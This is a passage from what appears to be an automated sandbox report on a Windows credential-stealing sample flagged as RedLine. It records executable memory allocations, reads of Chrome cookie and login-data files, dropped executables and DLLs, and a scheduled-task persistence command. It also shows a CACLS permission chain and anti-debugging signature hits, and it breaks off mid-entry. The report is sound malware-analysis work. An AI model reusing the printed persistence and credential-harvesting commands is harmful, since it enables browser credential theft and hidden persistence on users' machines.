NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d92000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00950000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c12000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x725ab000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x725d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x725d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00990000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ae0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00562000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x714ea000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73741000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc9f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f8b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6d491000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6d46e000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6d2eb000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2968
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

number_of_free_clusters: 3252721
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252721
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252370
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252370
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252016
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3252016
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3251544
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3251544
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3251358
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 3251358
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
Application Crash Process iexplore.exe with pid 1356 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 104002204
registers.edi: 88892516
registers.eax: 104002204
registers.ebp: 104002284
registers.edx: 7502716
registers.ebx: 104002568
registers.esi: 2147746133
registers.ecx: 88745016
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x69d1540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x69d152ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x69df0ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 65789352
registers.edi: 1953561104
registers.eax: 65789352
registers.ebp: 65789432
registers.edx: 1
registers.ebx: 88709276
registers.esi: 2147746133
registers.ecx: 1322947701
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\Xf6FM0Om.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\4xZ332Qr.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\xu7aE2xu.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5QZ57Cm.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\CL7mg6kK.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\3Fy8If55.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\1Xf30uE8.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sw8Ll4hQ.exe
file C:\Users\test22\AppData\Local\Temp\IXP004.TMP\2LJ507bv.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\sysnative\cmd
parameters: /c "C:\Users\test22\AppData\Local\Temp\87E8.tmp\87F8.tmp\87F9.bat C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe"
filepath: C:\Windows\sysnative\cmd
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2708
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x05e50000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer:
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x0016d800', u'virtual_address': u'0x0000c000', u'entropy': 7.976440396212957, u'name': u'.rsrc', u'virtual_size': u'0x0016e000'} entropy 7.97644039621 description A section with a high entropy has been found
entropy 0.978253596521 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Take ScreenShot rule ScreenShot
description PWS Memory rule Generic_PWS_Memory_Zero
description RedLine stealer rule RedLine_Stealer_m_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000508
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000508
key_handle: 0x00000514
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
